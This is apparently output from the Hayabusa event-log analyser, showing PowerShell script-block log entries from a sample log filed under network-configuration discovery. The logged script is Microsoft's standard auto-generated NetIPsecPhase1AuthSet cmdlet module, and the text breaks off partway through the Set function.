+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletizati",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"on_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 